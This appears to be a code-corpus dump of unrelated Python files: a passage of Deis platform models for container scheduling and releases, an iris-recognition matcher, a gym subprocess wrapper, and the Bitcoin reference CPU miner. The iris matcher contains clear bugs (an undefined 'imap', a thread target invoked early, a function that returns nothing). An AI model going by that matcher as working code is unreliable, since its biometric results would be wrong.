if not re.search(r'^[a-zA-Z0-9-\.]+$', value):
raise ValidationError('"{}" contains unexpected characters'.format(value))
class AuditedModel(models.Model):
"""Add created and updated fields to a model."""
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
class Meta:
"""Mark :class:`AuditedModel` as abstract."""
abstract = True
class UuidAuditedModel(AuditedModel):
"""Add a UUID primary key to an :class:`AuditedModel`."""
uuid = fields.UuidField('UUID', primary_key=True)
class Meta:
"""Mark :class:`UuidAuditedModel` as abstract."""
abstract = True
@python_2_unicode_compatible
class App(UuidAuditedModel):
"""
Application used to service requests on behalf of end-users
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
id = models.SlugField(max_length=64, unique=True, default=utils.generate_app_name,
validators=[validate_id_is_docker_compatible,
validate_reserved_names])
structure = JSONField(default={}, blank=True, validators=[validate_app_structure])
class Meta:
permissions = (('use_app', 'Can use app'),)
def __str__(self):
return self.id
def _get_scheduler(self, *args, **kwargs):
module_name = 'scheduler.' + settings.SCHEDULER_MODULE
mod = importlib.import_module(module_name)
return mod.SchedulerClient(settings.SCHEDULER_TARGET,
settings.SCHEDULER_AUTH,
settings.SCHEDULER_OPTIONS,
settings.SSH_PRIVATE_KEY)
_scheduler = property(_get_scheduler)
@property
def url(self):
return self.id + '.' + settings.DEIS_DOMAIN
def log(self, message):
"""Logs a message to the application's log file.
This is a workaround for how Django interacts with Python's logging module. Each app
needs its own FileHandler instance so it can write to its own log file. That won't work in
Django's case because logging is set up before you run the server and it disables all
existing logging configurations.
"""
with open(os.path.join(settings.DEIS_LOG_DIR, self.id + '.log'), 'a') as f:
msg = "{} deis[api]: {}\n".format(time.strftime(settings.DEIS_DATETIME_FORMAT),
message)
f.write(msg.encode('utf-8'))
def create(self, *args, **kwargs):
"""Create a new application with an initial config and release"""
config = Config.objects.create(owner=self.owner, app=self)
Release.objects.create(version=1, owner=self.owner, app=self, config=config, build=None)
def delete(self, *args, **kwargs):
"""Delete this application including all containers"""
for c in self.container_set.exclude(type='run'):
c.destroy()
self._clean_app_logs()
return super(App, self).delete(*args, **kwargs)
def _clean_app_logs(self):
"""Delete application logs stored by the logger component"""
path = os.path.join(settings.DEIS_LOG_DIR, self.id + '.log')
if os.path.exists(path):
os.remove(path)
def scale(self, user, structure): # noqa
"""Scale containers up or down to match requested structure."""
if self.release_set.latest().build is None:
raise EnvironmentError('No build associated with this release')
requested_structure = structure.copy()
release = self.release_set.latest()
# test for available process types
available_process_types = release.build.procfile or {}
for container_type in requested_structure.keys():
if container_type == 'cmd':
continue # allow docker cmd types in case we don't have the image source
if container_type not in available_process_types:
raise EnvironmentError(
'Container type {} does not exist in application'.format(container_type))
msg = '{} scaled containers '.format(user.username) + ' '.join(
"{}={}".format(k, v) for k, v in requested_structure.items())
log_event(self, msg)
# iterate and scale by container type (web, worker, etc)
changed = False
to_add, to_remove = [], []
for container_type in requested_structure.keys():
containers = list(self.container_set.filter(type=container_type).order_by('created'))
# increment new container nums off the most recent container
results = self.container_set.filter(type=container_type).aggregate(Max('num'))
container_num = (results.get('num__max') or 0) + 1
requested = requested_structure.pop(container_type)
diff = requested - len(containers)
if diff == 0:
continue
changed = True
while diff < 0:
c = containers.pop()
to_remove.append(c)
diff += 1
while diff > 0:
# create a database record
c = Container.objects.create(owner=self.owner,
app=self,
release=release,
type=container_type,
num=container_num)
to_add.append(c)
container_num += 1
diff -= 1
if changed:
if to_add:
self._start_containers(to_add)
if to_remove:
self._destroy_containers(to_remove)
# save new structure to the database
vals = self.container_set.values('type').annotate(Count('pk')).order_by()
self.structure = {v['type']: v['pk__count'] for v in vals}
self.save()
return changed
def _start_containers(self, to_add):
"""Creates and starts containers via the scheduler"""
create_threads = []
start_threads = []
for c in to_add:
create_threads.append(threading.Thread(target=c.create))
start_threads.append(threading.Thread(target=c.start))
[t.start() for t in create_threads]
[t.join() for t in create_threads]
if set([c.state for c in to_add]) != set([Container.CREATED]):
err = 'aborting, failed to create some containers'
log_event(self, err, logging.ERROR)
raise RuntimeError(err)
[t.start() for t in start_threads]
[t.join() for t in start_threads]
if set([c.state for c in to_add]) != set([Container.UP]):
err = 'warning, some containers failed to start'
log_event(self, err, logging.WARNING)
def _destroy_containers(self, to_destroy):
"""Destroys containers via the scheduler"""
destroy_threads = []
for c in to_destroy:
destroy_threads.append(threading.Thread(target=c.destroy))
[t.start() for t in destroy_threads]
[t.join() for t in destroy_threads]
[c.delete() for c in to_destroy if c.state == Container.DESTROYED]
if set([c.state for c in to_destroy]) != set([Container.DESTROYED]):
err = 'aborting, failed to destroy some containers'
log_event(self, err, logging.ERROR)
raise RuntimeError(err)
def deploy(self, user, release, initial=False):
"""Deploy a new release to this application"""
existing = self.container_set.exclude(type='run')
new = []
for e in existing:
n = e.clone(release)
n.save()
new.append(n)
# create new containers
threads = []
for c in new:
threads.append(threading.Thread(target=c.create))
[t.start() for t in threads]
[t.join() for t in threads]
# check for containers that failed to create
if len(new) > 0 and set([c.state for c in new]) != set([Container.CREATED]):
err = 'aborting, failed to create some containers'
log_event(self, err, logging.ERROR)
self._destroy_containers(new)
raise RuntimeError(err)
# start new containers
threads = []
for c in new:
threads.append(threading.Thread(target=c.start))
[t.start() for t in threads]
[t.join() for t in threads]
# check for containers that didn't come up correctly
if len(new) > 0 and set([c.state for c in new]) != set([Container.UP]):
# report the deploy error
err = 'warning, some containers failed to start'
log_event(self, err, logging.WARNING)
# destroy old containers
if existing:
self._destroy_containers(existing)
# perform default scaling if necessary
if initial:
self._default_scale(user, release)
def _default_scale(self, user, release):
"""Scale to default structure based on release type"""
# if there is no SHA, assume a docker image is being promoted
if not release.build.sha:
structure = {'cmd': 1}
# if a dockerfile exists without a procfile, assume docker workflow
elif release.build.dockerfile and not release.build.procfile:
structure = {'cmd': 1}
# if a procfile exists without a web entry, assume docker workflow
elif release.build.procfile and 'web' not in release.build.procfile:
structure = {'cmd': 1}
# default to heroku workflow
else:
structure = {'web': 1}
self.scale(user, structure)
def logs(self):
"""Return aggregated log data for this application."""
path = os.path.join(settings.DEIS_LOG_DIR, self.id + '.log')
if not os.path.exists(path):
raise EnvironmentError('Could not locate logs')
data = subprocess.check_output(['tail', '-n', str(settings.LOG_LINES), path])
return data
def run(self, user, command):
"""Run a one-off command in an ephemeral app container."""
# FIXME: remove the need for SSH private keys by using
# a scheduler that supports one-off admin tasks natively
if not settings.SSH_PRIVATE_KEY:
raise EnvironmentError('Support for admin commands is not configured')
if self.release_set.latest().build is None:
raise EnvironmentError('No build associated with this release to run this command')
# TODO: add support for interactive shell
msg = "{} runs '{}'".format(user.username, command)
log_event(self, msg)
c_num = max([c.num for c in self.container_set.filter(type='run')] or [0]) + 1
# create database record for run process
c = Container.objects.create(owner=self.owner,
app=self,
release=self.release_set.latest(),
type='run',
num=c_num)
image = c.release.image
# check for backwards compatibility
def _has_hostname(image):
repo, tag = dockerutils.parse_repository_tag(image)
return True if '/' in repo and '.' in repo.split('/')[0] else False
if not _has_hostname(image):
image = '{}:{}/{}'.format(settings.REGISTRY_HOST,
settings.REGISTRY_PORT,
image)
# SECURITY: shell-escape user input
escaped_command = command.replace("'", "'\\''")
return c.run(escaped_command)
@python_2_unicode_compatible
class Container(UuidAuditedModel):
"""
Docker container used to securely host an application process.
"""
INITIALIZED = 'initialized'
CREATED = 'created'
UP = 'up'
DOWN = 'down'
DESTROYED = 'destroyed'
CRASHED = 'crashed'
ERROR = 'error'
STATE_CHOICES = (
(INITIALIZED, 'initialized'),
(CREATED, 'created'),
(UP, 'up'),
(DOWN, 'down'),
(DESTROYED, 'destroyed'),
(CRASHED, 'crashed'),
(ERROR, 'error'),
)
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
release = models.ForeignKey('Release')
type = models.CharField(max_length=128, blank=False)
num = models.PositiveIntegerField()
state = FSMField(default=INITIALIZED, choices=STATE_CHOICES,
protected=True, propagate=False)
def short_name(self):
return "{}.{}.{}".format(self.app.id, self.type, self.num)
short_name.short_description = 'Name'
def __str__(self):
return self.short_name()
class Meta:
get_latest_by = '-created'
ordering = ['created']
def _get_job_id(self):
app = self.app.id
release = self.release
version = "v{}".format(release.version)
num = self.num
job_id = "{app}_{version}.{self.type}.{num}".format(**locals())
return job_id
_job_id = property(_get_job_id)
def _get_scheduler(self):
return self.app._scheduler
_scheduler = property(_get_scheduler)
def _get_command(self):
try:
# if this is not procfile-based app, ensure they cannot break out
# and run arbitrary commands on the host
# FIXME: remove slugrunner's hardcoded entrypoint
if self.release.build.dockerfile or not self.release.build.sha:
return "bash -c '{}'".format(self.release.build.procfile[self.type])
else:
return 'start {}'.format(self.type)
# if the key is not present or if a parent attribute is None
except (KeyError, TypeError, AttributeError):
# handle special case for Dockerfile deployments
return '' if self.type == 'cmd' else 'start {}'.format(self.type)
_command = property(_get_command)
def clone(self, release):
c = Container.objects.create(owner=self.owner,
app=self.app,
release=release,
type=self.type,
num=self.num)
return c
@transition(field=state, source=INITIALIZED, target=CREATED, on_error=ERROR)
def create(self):
image = self.release.image
kwargs = {'memory': self.release.config.memory,
'cpu': self.release.config.cpu,
'tags': self.release.config.tags}
job_id = self._job_id
try:
self._scheduler.create(
name=job_id,
image=image,
command=self._command,
**kwargs)
except Exception as e:
err = '{} (create): {}'.format(job_id, e)
log_event(self.app, err, logging.ERROR)
raise
@transition(field=state, source=[CREATED, UP, DOWN], target=UP, on_error=CRASHED)
def start(self):
job_id = self._job_id
try:
self._scheduler.start(job_id)
except Exception as e:
err = '{} (start): {}'.format(job_id, e)
log_event(self.app, err, logging.WARNING)
raise
@transition(field=state, source=UP, target=DOWN, on_error=ERROR)
def stop(self):
job_id = self._job_id
try:
self._scheduler.stop(job_id)
except Exception as e:
err = '{} (stop): {}'.format(job_id, e)
log_event(self.app, err, logging.ERROR)
raise
@transition(field=state, source='*', target=DESTROYED, on_error=ERROR)
def destroy(self):
job_id = self._job_id
try:
self._scheduler.destroy(job_id)
except Exception as e:
err = '{} (destroy): {}'.format(job_id, e)
log_event(self.app, err, logging.ERROR)
raise
def run(self, command):
"""Run a one-off command"""
if self.release.build is None:
raise EnvironmentError('No build associated with this release '
'to run this command')
image = self.release.image
job_id = self._job_id
entrypoint = '/bin/bash'
# if this is a procfile-based app, switch the entrypoint to slugrunner's default
# FIXME: remove slugrunner's hardcoded entrypoint
if self.release.build.procfile and \
self.release.build.sha and not \
self.release.build.dockerfile:
entrypoint = '/runner/init'
command = "'{}'".format(command)
else:
command = "-c '{}'".format(command)
try:
rc, output = self._scheduler.run(job_id, image, entrypoint, command)
return rc, output
except Exception as e:
err = '{} (run): {}'.format(job_id, e)
log_event(self.app, err, logging.ERROR)
raise
@python_2_unicode_compatible
class Push(UuidAuditedModel):
"""
Instance of a push used to trigger an application build
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
sha = models.CharField(max_length=40)
fingerprint = models.CharField(max_length=255)
receive_user = models.CharField(max_length=255)
receive_repo = models.CharField(max_length=255)
ssh_connection = models.CharField(max_length=255)
ssh_original_command = models.CharField(max_length=255)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'uuid'),)
def __str__(self):
return "{0}-{1}".format(self.app.id, self.sha[:7])
@python_2_unicode_compatible
class Build(UuidAuditedModel):
"""
Instance of a software build used by runtime nodes
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
image = models.CharField(max_length=256)
# optional fields populated by builder
sha = models.CharField(max_length=40, blank=True)
procfile = JSONField(default={}, blank=True)
dockerfile = models.TextField(blank=True)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'uuid'),)
def create(self, user, *args, **kwargs):
latest_release = self.app.release_set.latest()
source_version = 'latest'
if self.sha:
source_version = 'git-{}'.format(self.sha)
new_release = latest_release.new(user,
build=self,
config=latest_release.config,
source_version=source_version)
initial = True if self.app.structure == {} else False
try:
self.app.deploy(user, new_release, initial=initial)
return new_release
except RuntimeError:
new_release.delete()
raise
def __str__(self):
return "{0}-{1}".format(self.app.id, self.uuid[:7])
@python_2_unicode_compatible
class Config(UuidAuditedModel):
"""
Set of configuration values applied as environment variables
during runtime execution of the Application.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
values = JSONField(default={}, blank=True)
memory = JSONField(default={}, blank=True)
cpu = JSONField(default={}, blank=True)
tags = JSONField(default={}, blank=True)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'uuid'),)
def __str__(self):
return "{}-{}".format(self.app.id, self.uuid[:7])
def save(self, **kwargs):
"""merge the old config with the new"""
try:
previous_config = self.app.config_set.latest()
for attr in ['cpu', 'memory', 'tags', 'values']:
# Guard against migrations from older apps without fixes to
# JSONField encoding.
try:
data = getattr(previous_config, attr).copy()
except AttributeError:
data = {}
try:
new_data = getattr(self, attr).copy()
except AttributeError:
new_data = {}
data.update(new_data)
# remove config keys if we provided a null value
[data.pop(k) for k, v in new_data.items() if v is None]
setattr(self, attr, data)
except Config.DoesNotExist:
pass
return super(Config, self).save(**kwargs)
@python_2_unicode_compatible
class Release(UuidAuditedModel):
"""
Software release deployed by the application platform
Releases contain a :class:`Build` and a :class:`Config`.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
version = models.PositiveIntegerField()
summary = models.TextField(blank=True, null=True)
config = models.ForeignKey('Config')
build = models.ForeignKey('Build', null=True)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'version'),)
def __str__(self):
return "{0}-v{1}".format(self.app.id, self.version)
@property
def image(self):
return '{}:v{}'.format(self.app.id, str(self.version))
def new(self, user, config, build, summary=None, source_version='latest'):
"""
Create a new application release using the provided Build and Config
on behalf of a user.
Releases start at v1 and auto-increment.
"""
# construct fully-qualified target image
new_version = self.version + 1
# create new release and auto-increment version
release = Release.objects.create(
owner=user, app=self.app, config=config,
build=build, version=new_version, summary=summary)
try:
release.publish()
except EnvironmentError as e:
# If we cannot publish this app, just log and carry on
logger.info(e)
pass
return release
def publish(self, source_version='latest'):
if self.build is None:
raise EnvironmentError('No build associated with this release to publish')
source_tag = 'git-{}'.format(self.build.sha) if self.build.sha else source_version
source_image = '{}:{}'.format(self.build.image, source_tag)
# IOW, this image did not come from the builder
# FIXME: remove check for mock registry module
if not self.build.sha and 'mock' not in settings.REGISTRY_MODULE:
# we assume that the image is not present on our registry,
# so shell out a task to pull in the repository
data = {
'src': self.build.image
}
requests.post(
'{}/v1/repositories/{}/tags'.format(settings.REGISTRY_URL,
self.app.id),
data=data,
)
# update the source image to the repository we just imported
source_image = self.app.id
# if the image imported had a tag specified, use that tag as the source
if ':' in self.build.image:
if '/' not in self.build.image[self.build.image.rfind(':') + 1:]:
source_image += self.build.image[self.build.image.rfind(':'):]
publish_release(source_image,
self.config.values,
self.image)
def previous(self):
"""
Return the previous Release to this one.
:return: the previous :class:`Release`, or None
"""
releases = self.app.release_set
if self.pk:
releases = releases.exclude(pk=self.pk)
try:
# Get the Release previous to this one
prev_release = releases.latest()
except Release.DoesNotExist:
prev_release = None
return prev_release
def rollback(self, user, version):
if version < 1:
raise EnvironmentError('version cannot be below 0')
summary = "{} rolled back to v{}".format(user, version)
prev = self.app.release_set.get(version=version)
new_release = self.new(
user,
build=prev.build,
config=prev.config,
summary=summary,
source_version='v{}'.format(version))
try:
self.app.deploy(user, new_release)
return new_release
except RuntimeError:
new_release.delete()
raise
def save(self, *args, **kwargs): # noqa
if not self.summary:
self.summary = ''
prev_release = self.previous()
# compare this build to the previous build
old_build = prev_release.build if prev_release else None
old_config = prev_release.config if prev_release else None
# if the build changed, log it and who pushed it
if self.version == 1:
self.summary += "{} created initial release".format(self.app.owner)
elif self.build != old_build:
if self.build.sha:
self.summary += "{} deployed {}".format(self.build.owner, self.build.sha[:7])
else:
self.summary += "{} deployed {}".format(self.build.owner, self.build.image)
# if the config data changed, log the dict diff
if self.config != old_config:
dict1 = self.config.values
dict2 = old_config.values if old_config else {}
diff = dict_diff(dict1, dict2)
# try to be as succinct as possible
added = ', '.join(k for k in diff.get('added', {}))
added = 'added ' + added if added else ''
changed = ', '.join(k for k in diff.get('changed', {}))
changed = 'changed ' + changed if changed else ''
deleted = ', '.join(k for k in diff.get('deleted', {}))
deleted = 'deleted ' + deleted if deleted else ''
changes = ', '.join(i for i in (added, changed, deleted) if i)
if changes:
if self.summary:
self.summary += ' and '
self.summary += "{} {}".format(self.config.owner, changes)
# if the limits changed (memory or cpu), log the dict diff
changes = []
old_mem = old_config.memory if old_config else {}
diff = dict_diff(self.config.memory, old_mem)
if diff.get('added') or diff.get('changed') or diff.get('deleted'):
changes.append('memory')
old_cpu = old_config.cpu if old_config else {}
diff = dict_diff(self.config.cpu, old_cpu)
if diff.get('added') or diff.get('changed') or diff.get('deleted'):
changes.append('cpu')
if changes:
changes = 'changed limits for '+', '.join(changes)
self.summary += "{} {}".format(self.config.owner, changes)
# if the tags changed, log the dict diff
changes = []
old_tags = old_config.tags if old_config else {}
diff = dict_diff(self.config.tags, old_tags)
# try to be as succinct as possible
added = ', '.join(k for k in diff.get('added', {}))
added = 'added tag ' + added if added else ''
changed = ', '.join(k for k in diff.get('changed', {}))
changed = 'changed tag ' + changed if changed else ''
deleted = ', '.join(k for k in diff.get('deleted', {}))
deleted = 'deleted tag ' + deleted if deleted else ''
changes = ', '.join(i for i in (added, changed, deleted) if i)
if changes:
if self.summary:
self.summary += ' and '
self.summary += "{} {}".format(self.config.owner, changes)
if not self.summary:
if self.version == 1:
self.summary = "{} created the initial release".format(self.owner)
else:
self.summary = "{} changed nothing".format(self.owner)
super(Release, self).save(*args, **kwargs)
@python_2_unicode_compatible
class Domain(AuditedModel):
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
domain = models.TextField(blank=False, null=False, unique=True)
def __str__(self):
return self.domain
@python_2_unicode_compatible
class Key(UuidAuditedModel):
"""An SSH public key."""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
id = models.CharField(max_length=128)
public = models.TextField(unique=True, validators=[validate_base64])
class Meta:
verbose_name = 'SSH Key'
unique_together = (('owner', 'id'))
def __str__(self):
return "{}...{}".format(self.public[:18], self.public[-31:])
# define update/delete callbacks for synchronizing
# models with the configuration management backend
def _log_build_created(**kwargs):
if kwargs.get('created'):
build = kwargs['instance']
log_event(build.app, "build {} created".format(build))
def _log_release_created(**kwargs):
if kwargs.get('created'):
release = kwargs['instance']
log_event(release.app, "release {} created".format(release))
# append release lifecycle logs to the app
release.app.log(release.summary)
def _log_config_updated(**kwargs):
config = kwargs['instance']
log_event(config.app, "config {} updated".format(config))
def _log_domain_added(**kwargs):
domain = kwargs['instance']
msg = "domain {} added".format(domain)
log_event(domain.app, msg)
# adding a domain does not create a release, so we have to log here
domain.app.log(msg)
def _log_domain_removed(**kwargs):
domain = kwargs['instance']
msg = "domain {} removed".format(domain)
log_event(domain.app, msg)
# adding a domain does not create a release, so we have to log here
domain.app.log(msg)
def _etcd_publish_key(**kwargs):
key = kwargs['instance']
_etcd_client.write('/deis/builder/users/{}/{}'.format(
key.owner.username, fingerprint(key.public)), key.public)
def _etcd_purge_key(**kwargs):
key = kwargs['instance']
_etcd_client.delete('/deis/builder/users/{}/{}'.format(
key.owner.username, fingerprint(key.public)))
def _etcd_purge_user(**kwargs):
username = kwargs['instance'].username
try:
_etcd_client.delete(
'/deis/builder/users/{}'.format(username), dir=True, recursive=True)
except KeyError:
# If _etcd_publish_key() wasn't called, there is no user dir to delete.
pass
def _etcd_create_app(**kwargs):
appname = kwargs['instance']
if kwargs['created']:
_etcd_client.write('/deis/services/{}'.format(appname), None, dir=True)
def _etcd_purge_app(**kwargs):
appname = kwargs['instance']
_etcd_client.delete('/deis/services/{}'.format(appname), dir=True, recursive=True)
def _etcd_publish_domains(**kwargs):
app = kwargs['instance'].app
app_domains = app.domain_set.all()
if app_domains:
_etcd_client.write('/deis/domains/{}'.format(app),
' '.join(str(d.domain) for d in app_domains))
def _etcd_purge_domains(**kwargs):
app = kwargs['instance'].app
app_domains = app.domain_set.all()
if app_domains:
_etcd_client.write('/deis/domains/{}'.format(app),
' '.join(str(d.domain) for d in app_domains))
else:
_etcd_client.delete('/deis/domains/{}'.format(app))
# Log significant app-related events
post_save.connect(_log_build_created, sender=Build, dispatch_uid='api.models.log')
post_save.connect(_log_release_created, sender=Release, dispatch_uid='api.models.log')
post_save.connect(_log_config_updated, sender=Config, dispatch_uid='api.models.log')
post_save.connect(_log_domain_added, sender=Domain, dispatch_uid='api.models.log')
post_delete.connect(_log_domain_removed, sender=Domain, dispatch_uid='api.models.log')
# automatically generate a new token on creation
@receiver(post_save, sender=get_user_model())
def create_auth_token(sender, instance=None, created=False, **kwargs):
if created:
Token.objects.create(user=instance)
# save FSM transitions as they happen
def _save_transition(**kwargs):
kwargs['instance'].save()
# close database connections after transition
# to avoid leaking connections inside threads
from django.db import connection
connection.close()
post_transition.connect(_save_transition)
# wire up etcd publishing if we can connect
try:
_etcd_client = etcd.Client(host=settings.ETCD_HOST, port=int(settings.ETCD_PORT))
_etcd_client.get('/deis')
except etcd.EtcdException:
logger.log(logging.WARNING, 'Cannot synchronize with etcd cluster')
_etcd_client = None
if _etcd_client:
post_save.connect(_etcd_publish_key, sender=Key, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_key, sender=Key, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_user, sender=get_user_model(), dispatch_uid='api.models')
post_save.connect(_etcd_publish_domains, sender=Domain, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_domains, sender=Domain, dispatch_uid='api.models')
post_save.connect(_etcd_create_app, sender=App, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_app, sender=App, dispatch_uid='api.models')
|
iris_matching.py
|
import os
from kn_iris.feature_vec import *
import pickle, numpy as np, re
import threading
try:
import queue
que=queue.Queue()
except ImportError:
from multiprocessing import Queue
que=Queue()
from scipy.spatial import distance
try:
import itertools.imap as map
except ImportError:
pass
import operator
def iris_recg(test_db_model_path,image):
data = pickle.loads(open(test_db_model_path, "rb").read())
# print("[INFO] loading encodings...")
process_this_frame = True
iris_encodings = data["encodings"]
names = data["names"]
q = que
iris_name = threading.Thread(target=match_thread(iris_encodings,names,image,q)).start()
while not q.empty():
return q.get()
def match_thread(iris_encodings,names,iris_image,q):
iris_encodings_in_image = engroup(iris_image)
if iris_encodings_in_image !="invalid image":
match = find_match(iris_encodings, names, iris_encodings_in_image)
q.put(match)
else:
q.put("unmatch")
def hamming_check_string(str1,str2):
hamming_distance_value = 0
hamming_distance_value=np.sum((np.array(map(int, str1))) != (np.array(map(int, str2))))
return hamming_distance_value
def compare_iris_encodings(known_iris, iris_encodings_in_image,name):
finalVal = 0
hamming_distance_value=0
hamming_distance=0
finalVal2=0
for iriss in known_iris:
hgroup1, vgroup1 = iriss
hgroup2, vgroup2 = iris_encodings_in_image
hamming_distance_value = distance_loop1(hgroup1, hgroup2)
hamming_distance_value += distance_loop2(vgroup1, vgroup2, hamming_distance_value)
finalVal2=finalVal2+hamming_distance_value
print("++++++++hamming_distance1+++++++++",name,finalVal2)
return finalVal2
def valuation(hgroup1, hgroup2,vgroup1, vgroup2):
distnc1=distance.cdist(hgroup1, hgroup2,'hamming')
distnc2=distance.cdist(vgroup1, vgroup2,'hamming')
value1=np.average(distnc1)
value2=np.average(distnc2)
def distance_loop(str1, str2):
assert len(str1) == len(str2)
ne = operator.ne
return sum(imap(ne, str1, str2))
def distance_loop1(hgroup1, hgroup2):
hamming_distance_value = 0
for row in range(13):
# hgroup1[row] is a list of 32 members
for col in range(32):
hamming_distance_value += hamming_check_string(hgroup1[row][col],hgroup2[row][col])
return hamming_distance_value
def distance_loop2(vgroup1, vgroup2, hamming_distance_value):
for row in range(36):
for col in range(9):
hamming_distance_value += hamming_check_string(vgroup1[row][col],vgroup2[row][col])
return hamming_distance_value
def find_match(known_iris, names, iris_encodings_in_image):
namevalue=""
matchlist=[]
for index,iriss in enumerate(known_iris):
# print("hamming_dist_iriss",index,len(iriss))
matches = compare_iris_encodings(iriss, iris_encodings_in_image,names[index])
if matches !=0:
matchlist.append(matches)
else:
matchlist.append(2000)
# print("totallist",matchlist,names,(matchlist.index(min(matchlist))),matchlist[(matchlist.index(min(matchlist)))])
if matchlist[(matchlist.index(min(matchlist)))]<4500:
namevalue = names[(matchlist.index(min(matchlist)))]
# print("match",str(namevalue),matchlist[(matchlist.index(min(matchlist)))])
return str(namevalue)
else:
return "unmatch"
|
subprocess_env.py
|
from multiprocessing.connection import Connection, Pipe
from multiprocessing.context import Process
from typing import Union, Any, Callable
from gym import Env
class SubprocessEnv(Env):
def __init__(self, factory: Callable[[], Env], blocking: bool = True):
self._blocking = blocking
self._parent_conn, child_conn = Pipe()
self._process = Process(target=self._start, args=(factory, child_conn))
self._process.start()
self.observation_space, self.action_space = self._parent_conn.recv()
def _start(self, factory: Callable[[], Env], connection: Connection):
env = factory()
_ = env.reset()
connection.send((env.observation_space, env.action_space))
terminate = False
while not terminate:
command, kwargs = connection.recv()
if command == 'render':
rendering = env.render(**kwargs)
connection.send(rendering)
elif command == 'step':
step = env.step(**kwargs)
connection.send(step)
elif command == 'reset':
obs = env.reset(**kwargs)
connection.send(obs)
elif command == 'close':
terminate = True
connection.close()
def step(self, action):
self._parent_conn.send(('step', dict(action=action)))
return self._return()
def reset(self, **kwargs):
self._parent_conn.send(('reset', kwargs))
return self._return()
def render(self, mode: str = 'human', **kwargs):
self._parent_conn.send(('render', {'mode': mode, **kwargs}))
return self._return()
def close(self):
self._parent_conn.send(('close', False))
self._parent_conn.close()
def _return(self) -> Any:
if self._blocking:
return self._parent_conn.recv()
else:
return lambda: self._parent_conn.recv()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
